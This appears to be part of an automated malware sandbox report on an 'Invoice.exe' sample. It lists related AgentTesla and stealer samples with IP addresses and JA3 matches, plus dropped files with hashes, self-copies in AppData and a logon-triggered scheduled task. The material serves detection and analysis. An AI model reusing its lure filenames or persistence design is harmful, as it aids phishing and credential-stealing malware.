PUBLIC-DOMAIN-REGISTRYUS	20240328-REV2.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	Payment.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	SecuriteInfo.com.Win32.PWSX-gen.29608.5434.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.199.224
	Dhl Express Shipping Docs .pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	PR2403016.scr.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	OKJ2402PRT000025.PDF.scr.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	PO82100088.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	162.215.248.214

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.26.12.205 104.26.13.205
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.26.12.205 104.26.13.205
	PONO6188.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205 104.26.13.205
	Payment details.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205 104.26.13.205
	Docs.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205 104.26.13.205
	PO#50124.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205 104.26.13.205
	Statement of Account PDF.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205 104.26.13.205
	CHEMICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205 104.26.13.205
	Payment.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205 104.26.13.205
	SOA FOR APR 2024 PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205 104.26.13.205

Process:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice.exe.log

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kaJNzBnxbXm.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380134126512796
Encrypted:	false
SSDEEP:	48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:+LHxvIIwLgZ2KRHWLOuggs
MD5:	2A51987DAFE4586D09FC4BE0507F6B71
SHA1:	AE3D26F5D8A78CB88E29ADEC340C56A0F6B3D3B7
SHA-256:	2EBC59B6B9D301FBFDD52FA8CF1C811F7814C4F24943D6BC3F5FD7B8529F8D16
SHA-512:	F1D8BFF693D16BEEE9D0C06CEA7CD925CACB33170201A35BC01099BA4225BB26EAE347213F9C29DF3E320CE0DD1D299D5B735D089145EE1E188A8024F62F78C3
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3f4u3wtl.2iq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ujf41ed.ikw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nyqbqhq.1dt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzf5tqoi.mb3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hetoucjq.2s4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myghffyz.5ex.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxbgljiu.ocj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmrawgil.3tt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp21D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.118770559405062
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaQxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTTv
MD5:	F6AE744E225BDD7C601A7FB1AB4C6B83
SHA1:	0737DE676BE64C292799BF4AC9297DB440ECB41F
SHA-256:	D277E365029A7EDF173BEEC30A994813EE78D1D846BFBA070E01845FF8B5684A
SHA-512:	95AA09D104C72DA8E387D60DD433CAE7EDC496926286F28184C70BC1964AABD8087E9F8FB24A11CF9A21332BD12387BE296C6D291E9FFA296CECF40695DB532F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpA865.tmp

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.118770559405062
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaQxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTTv
MD5:	F6AE744E225BDD7C601A7FB1AB4C6B83
SHA1:	0737DE676BE64C292799BF4AC9297DB440ECB41F
SHA-256:	D277E365029A7EDF173BEEC30A994813EE78D1D846BFBA070E01845FF8B5684A
SHA-512:	95AA09D104C72DA8E387D60DD433CAE7EDC496926286F28184C70BC1964AABD8087E9F8FB24A11CF9A21332BD12387BE296C6D291E9FFA296CECF40695DB532F
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.118770559405062
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaQxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTTv
MD5:	F6AE744E225BDD7C601A7FB1AB4C6B83
SHA1:	0737DE676BE64C292799BF4AC9297DB440ECB41F
SHA-256:	D277E365029A7EDF173BEEC30A994813EE78D1D846BFBA070E01845FF8B5684A
SHA-512:	95AA09D104C72DA8E387D60DD433CAE7EDC496926286F28184C70BC1964AABD8087E9F8FB24A11CF9A21332BD12387BE296C6D291E9FFA296CECF40695DB532F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpE34B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.118770559405062
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaQxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTTv
MD5:	F6AE744E225BDD7C601A7FB1AB4C6B83
SHA1:	0737DE676BE64C292799BF4AC9297DB440ECB41F
SHA-256:	D277E365029A7EDF173BEEC30A994813EE78D1D846BFBA070E01845FF8B5684A
SHA-512:	95AA09D104C72DA8E387D60DD433CAE7EDC496926286F28184C70BC1964AABD8087E9F8FB24A11CF9A21332BD12387BE296C6D291E9FFA296CECF40695DB532F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	841728
Entropy (8bit):	7.960611484893566
Encrypted:	false
SSDEEP:	12288:zPqnHvjNIrpf9rN/mc/CQw5PXdFPemY3kI26WE+34DO2IOxzV2SYm9nEix9H82rF:zyPjKr5BNDuXvfY0RfmIkzLNP5rJ
MD5:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
SHA1:	07981693F5B38FA99A88ACA0E13BA5B6022B1465
SHA-256:	E62255F98543E0BB1ABF017AF13FD483E1382158021B7EDDE65FA55C1AD290CF
SHA-512:	B62EA9A4710DFC855CFD47F2C0CB8787C9EA6B1159387431D1CC70B5989DD59086AAADD62E42FEA9B21D28834B6ECE20DC1715245762D026E48E315544529F75
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34% Antivirus: Virustotal, Detection: 43%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M.+f..............0......4........... ........@.. .......................@............@.....................................O........1................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc....1.......2..................@..@.reloc....... ......................@..B........................H........]...o..........<...X...........................................:.(......}......0...........(....o'....(......(....o+.......o...(....o)...(.......o-.....(......(......o........r...po......o.....o.....o......o.........(........o.....3....o .......r...ps!...z&.............m.:........0..;.......("...r...po#...o$...s%....s&.....r...po......o'....o....((...,..o)...r...p~...o+...&+..o)...r...p.o....o+...&.o....((...,..o)...r...p~*...o+...&+..o)...r...p.o....o+...&.o....

C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	841728
Entropy (8bit):	7.960611484893566
Encrypted:	false
SSDEEP:	12288:zPqnHvjNIrpf9rN/mc/CQw5PXdFPemY3kI26WE+34DO2IOxzV2SYm9nEix9H82rF:zyPjKr5BNDuXvfY0RfmIkzLNP5rJ
MD5:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
SHA1:	07981693F5B38FA99A88ACA0E13BA5B6022B1465
SHA-256:	E62255F98543E0BB1ABF017AF13FD483E1382158021B7EDDE65FA55C1AD290CF
SHA-512:	B62EA9A4710DFC855CFD47F2C0CB8787C9EA6B1159387431D1CC70B5989DD59086AAADD62E42FEA9B21D28834B6ECE20DC1715245762D026E48E315544529F75
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34% Antivirus: Virustotal, Detection: 43%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M.+f..............0......4........... ........@.. .......................@............@.....................................O........1................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc....1.......2..................@..@.reloc....... ......................@..B........................H........]...o..........<...X...........................................:.(......}......0...........(....o'....(......(....o+.......o...(....o)...(.......o-.....(......(......o........r...po......o.....o.....o......o.........(........o.....3....o .......r...ps!...z&.............m.:........0..;.......("...r...po#...o$...s%....s&.....r...po......o'....o....((...,..o)...r...p~...o+...&+..o)...r...p.o....o+...&.o....((...,..o)...r...p~*...o+...&+..o)...r...p.o....o+...&.o....

C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.960611484893566
